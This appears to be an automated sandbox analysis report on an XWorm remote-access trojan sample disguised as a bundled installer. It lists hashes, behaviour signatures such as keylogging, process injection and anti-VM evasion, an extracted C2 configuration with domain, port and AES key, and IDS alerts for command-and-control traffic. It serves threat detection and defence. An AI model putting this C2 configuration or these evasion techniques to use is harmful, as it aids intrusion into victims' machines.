Windows Analysis Report
pKxhpP0spW.exe

Overview

General Information

Sample name: pKxhpP0spW.exe
renamed because original name is a hash value
Original sample name: 2047251822df06e77eba8c59f695d0b31c0b79199f37cf496f04d6955f5acc50.exe
Analysis ID: 1614136
MD5: 5b5fdbda39a6b76cb6f58bd3e7c94a0d
SHA1: c95e0db60f54b3940ce26f88e6576b2cb27a7ab4
SHA256: 2047251822df06e77eba8c59f695d0b31c0b79199f37cf496f04d6955f5acc50
Tags: exefavor-ydns-euuser-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Potentially malicious time measurement code found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)

AV Detection

Source: 00000026.00000002.2599427172.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["favor.ydns.eu"], "Port": 2627, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\boost_filesystem-mt-x64.dll ReversingLabs: Detection: 37%
Source: pKxhpP0spW.exe Virustotal: Detection: 9%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp String decryptor: favor.ydns.eu
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp String decryptor: 2627
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp String decryptor: <123456789>
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp String decryptor: PLATA
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp String decryptor: USB.exe
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD94601090 BCryptGenRandom, 4_2_00007FFD94601090
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD946A16C0 BCryptSetProperty, 4_2_00007FFD946A16C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD946A1850 BCryptSetProperty, 4_2_00007FFD946A1850
Source: C:\Users\user\SystemRootDoc\motor1.exe Code function: 21_2_00007FFD92791090 BCryptGenRandom, 21_2_00007FFD92791090
Source: C:\Users\user\SystemRootDoc\motor1.exe Code function: 21_2_00007FFD9B1AAC20 BCryptGenRandom,_CxxThrowException, 21_2_00007FFD9B1AAC20
Source: C:\Users\user\SystemRootDoc\motor1.exe Code function: 21_2_00007FFD9B1A5A10 BCryptOpenAlgorithmProvider,BCryptGenRandom,?temp_directory_path@detail@filesystem@boost@@YA?AVpath@23@PEAVerror_code@system@3@@Z,?convert@path_traits@detail@filesystem@boost@@YAXPEBD0AEAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PEBV?$codecvt@_WDU_Mbstatet@@@6@@Z,?append_v3@path@filesystem@boost@@AEAAXPEB_W0@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,BCryptCloseAlgorithmProvider, 21_2_00007FFD9B1A5A10
Source: C:\Users\user\SystemRootDoc\motor1.exe Code function: 21_2_00007FFD9B1A1EA0 BCryptOpenAlgorithmProvider,BCryptOpenAlgorithmProvider,__std_exception_copy, 21_2_00007FFD9B1A1EA0
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_28d48a0b-c
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: pKxhpP0spW.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndPointer.pdb source: motor1.exe, 00000004.00000002.2548428390.00007FFDA5523000.00000002.00000001.01000000.00000016.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2605452248.00007FFDA4DA3000.00000002.00000001.01000000.0000002B.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndNetworking.pdb source: motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMcrypto\ex_data.c source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: motor1.exe, 00000004.00000002.2551275327.00007FFDAC0D5000.00000002.00000001.01000000.0000000E.sdmp, motor1.exe, 00000015.00000002.2605772212.00007FFDA54C5000.00000002.00000001.01000000.00000022.sdmp, vcruntime140_1.dll.4.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb** source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndVersion.pdb source: motor1.exe, 00000004.00000002.2546408225.00007FFDA3A8B000.00000002.00000001.01000000.00000017.sdmp, motor1.exe, 00000015.00000002.2604104370.00007FFDA32FB000.00000002.00000001.01000000.00000029.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb'' source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdb source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F517000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Wed Aug 4 14:11:39 2021 UTCplatform: VC-conan-Release-Windows-x86_64-Visual Studio-16OPENSSLDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\res"userSDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\lib\users-1_1"not availablecrypto\ex_data.c source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdbqq source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\installer.pdb source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb!! source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb%% source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndString.pdb source: motor1.exe, 00000004.00000002.2552861990.00007FFDAC107000.00000002.00000001.01000000.0000000B.sdmp, motor1.exe, 00000015.00000002.2606186290.00007FFDA5BB7000.00000002.00000001.01000000.0000001E.sdmp, FndString.dll.4.dr
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdb source: vcomp140.dll.1.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\WebUid.pdb source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdbGCTL source: vcomp140.dll.1.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb) source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140_codecvt_ids.amd64.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F52B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: motor1.exe, 00000004.00000002.2552193033.00007FFDAC0F1000.00000002.00000001.01000000.0000000D.sdmp, motor1.exe, 00000015.00000002.2604813167.00007FFDA3391000.00000002.00000001.01000000.00000021.sdmp
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: motor1.exe, 00000004.00000002.2546154593.00007FFDA38B5000.00000002.00000001.01000000.0000000C.sdmp, motor1.exe, 00000015.00000002.2605019875.00007FFDA33F5000.00000002.00000001.01000000.00000020.sdmp

Networking

Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:50025 -> 178.215.224.234:2627
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:50028 -> 178.215.224.234:2627
Source: Malware configuration extractor URLs: favor.ydns.eu
Source: global traffic TCP traffic: 192.168.2.6:49883 -> 178.215.224.234:2627
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: motor1.exe String found in binary or memory: disponibile all'indirizzo https://www.youtube.com/t/terms. L'Utente accetta di (i) rispettare tutte le leggi, le norme e i regolamenti applicabili e (ii) non accedere o utilizzare i Servizi API di YouTube in modo da violare tali leggi, norme e regolamenti o i equals www.youtube.com (Youtube)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: disponibile all'indirizzo https://www.youtube.com/t/terms. L'Utente accetta di (i) rispettare tutte le leggi, le norme e i regolamenti applicabili e (ii) non accedere o utilizzare i Servizi API di YouTube in modo da violare tali leggi, norme e regolamenti o in modo ingannevole, non etico, falso o fuorviante. equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.youtube.com/t/terms. equals www.youtube.com (Youtube)
Source: motor1.exe String found in binary or memory: The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates such laws, rules, and r equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: Versions of the Software intended for private use (personal license) as well as trial versions may not be used for commercial purposes, with only the following exception: use of any version of the Software to make videos for monetization on YouTube or similar services shall not constitute breach of this agreement as long as the description attached to such videos includes a statement to the effect that the video was created using the Software and includes a link to https://www.movavi.com/. equals www.youtube.com (Youtube)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: YOUTUBE API. Some Software, e.g., Movavi Video Editor and Movavi Slideshow Maker, uses the YouTube API under the terms of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates such laws, rules, and regulations, or in a manner that is deceptive, unethical, false, or misleading. equals www.youtube.com (Youtube)
Source: motor1.exe String found in binary or memory: ce conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates s equals www.youtube.com (Youtube)
Source: motor1.exe String found in binary or memory: eshow Maker, uses the YouTube API under the terms of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: gral de ces conditions d'utilisation est disponible sur https://www.youtube.com/t/terms. Vous acceptez (i) de vous conformer equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: ndigen Text dieser Nutzungsbedingungen finden Sie unter https://www.youtube.com/t/terms. Sie erkl equals www.youtube.com (Youtube)
Source: motor1.exe String found in binary or memory: s of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a mann equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: favor.ydns.eu
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: HTTP://WWW.MPEGLA.COM.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://.css
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://.jpg
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: http://WWW.MPEGLA.COM/.
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/nodejs/node/pull/38614)
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: pKxhpP0spW.exe, 00000001.00000003.2382394323.000000323D781000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/vercel/pkg/issues/1589
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://goo.gl/t5IS6M).
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#Replaceable
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
